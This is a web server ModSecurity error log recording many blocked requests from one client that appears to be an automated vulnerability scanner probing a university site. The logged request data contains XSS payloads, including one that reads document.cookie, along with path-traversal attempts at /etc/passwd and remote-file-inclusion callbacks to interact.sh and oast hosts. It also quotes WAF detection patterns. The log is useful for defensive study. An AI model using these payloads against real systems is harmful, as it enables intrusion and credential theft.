[Tue Aug 29 11:53:53.005438 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:callback: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/client/manage/ourphp_tz.php"] [unique_id "ZO154cCo-f0AAAolKbEAAAAe"]
[Tue Aug 29 11:53:53.591477 2023] [:error] [pid 2639] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/api.php"] [unique_id "ZO154cCo-f0AAApPcusAAAAa"]
[Tue Aug 29 11:53:54.558193 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/webadmin/authportal/bounce.php"] [unique_id "ZO154sCo-f0AAApQ2VUAAAAb"]
[Tue Aug 29 11:53:55.851320 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:text: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/new-year-firework/firework/index.php"] [unique_id "ZO1548Co-f0AAAofm-cAAAAX"]
[Tue Aug 29 11:53:56.589542 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mod: list</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cms/info.php"] [unique_id "ZO155MCo-f0AAAoAk2oAAAAC"]
[Tue Aug 29 11:53:56.638575 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:error_description. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:error_description: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php"] [unique_id "ZO155MCo-f0AAAolKbwAAAAe"]
[Tue Aug 29 11:53:57.584489 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:!'><sVg/OnLoAD. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:!'><sVg/OnLoAD: !'><sVg/OnLoAD"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/Login"] [unique_id "ZO155cCo-f0AAAoW7WoAAAAJ"]
[Tue Aug 29 11:54:00.551931 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:woof_redraw_elements[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:woof_redraw_elements[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO156MCo-f0AAAolKcQAAAAe"]
[Tue Aug 29 11:54:00.652216 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:i. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:i: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/flash-album-gallery/facebook.php"] [unique_id "ZO156MCo-f0AAAo2m84AAAAA"]
[Tue Aug 29 11:54:00.719838 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prodID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:prodID: '\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/PolicyMgmt/policyDetailsCard.do"] [unique_id "ZO156MCo-f0AAApOddQAAAAL"]
[Tue Aug 29 11:54:00.720721 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/inc/supportLoad.asp"] [unique_id "ZO156MCo-f0AAAoZ6WAAAAAK"]
[Tue Aug 29 11:54:01.627168 2023] [:error] [pid 2640] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:TF_submask. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:TF_submask: \\x22><script>alert(2Ue0HYDRcj1tkgDi2D2Z3jM8qWy)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/if.cgi"] [unique_id "ZO156cCo-f0AAApQ2WEAAAAb"]
[Tue Aug 29 11:54:02.695180 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/vsaPres/Web20/core/LocalProxy.ashx"] [unique_id "ZO156sCo-f0AAAo2m9oAAAAA"]
[Tue Aug 29 11:54:04.699159 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/loginsave.php"] [unique_id "ZO157MCo-f0AAAowNv8AAAAH"]
[Tue Aug 29 11:54:04.912136 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:success. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:success: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO157MCo-f0AAAowNwMAAAAH"]
[Tue Aug 29 11:54:08.250818 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....//....//....// found within ARGS:logFile: ....//....//....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/opm/read_sessionlog.php"] [unique_id "ZO158MCo-f0AAApa-A0AAAAg"]
[Tue Aug 29 11:54:08.567457 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:size: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/admin-font-editor/css.php"] [unique_id "ZO158MCo-f0AAApZHSgAAAAf"]
[Tue Aug 29 11:54:09.911823 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:theme: tes\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/contact.php"] [unique_id "ZO158cCo-f0AAApLWpAAAAAI"]
[Tue Aug 29 11:54:10.808484 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO158sCo-f0AAApV2zoAAAAJ"]
[Tue Aug 29 11:54:11.659687 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:windowTitle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ><!-- found within ARGS:windowTitle: AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp"] [unique_id "ZO1588Co-f0AAApgAw8AAAAH"]
[Tue Aug 29 11:54:12.876317 2023] [:error] [pid 2635] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0buoirx17y5yez.oast.site found within TX:1: cjmnijtjmimvgniikdb0buoirx17y5yez.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO159MCo-f0AAApLWpwAAAAI"]
[Tue Aug 29 11:54:14.147889 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/stageshow/stageshow_redirect.php"] [unique_id "ZO159sCo-f0AAAph8t4AAAAj"]
[Tue Aug 29 11:54:14.604340 2023] [:error] [pid 2656] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:s: \\x22/></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO159sCo-f0AAApgAyEAAAAH"]
[Tue Aug 29 11:54:14.604802 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php"] [unique_id "ZO159sCo-f0AAApa-B0AAAAg"]
[Tue Aug 29 11:54:14.713171 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:TargetService. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:TargetService: /knowage/servlet/AdapterHTTP?Page=LoginPage</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/knowage/servlet/AdapterHTTP"] [unique_id "ZO159sCo-f0AAAoAk6UAAAAC"]
[Tue Aug 29 11:54:15.605862 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:id: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/comm.php"] [unique_id "ZO1598Co-f0AAAoZ6asAAAAK"]
[Tue Aug 29 11:54:16.727584 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:var_filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/viewrq.php"] [unique_id "ZO15@MCo-f0AAAnHQwsAAAAT"]
[Tue Aug 29 11:54:16.807391 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prefix. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:prefix: \\x22><script>alert(document.domain);</script><"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/magmi/web/ajax_gettime.php"] [unique_id "ZO15@MCo-f0AAApa-CkAAAAg"]
[Tue Aug 29 11:54:20.849361 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAAoUJjEAAAAB"]
[Tue Aug 29 11:54:20.914939 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAApa-DkAAAAg"]
[Tue Aug 29 11:54:21.555624 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag 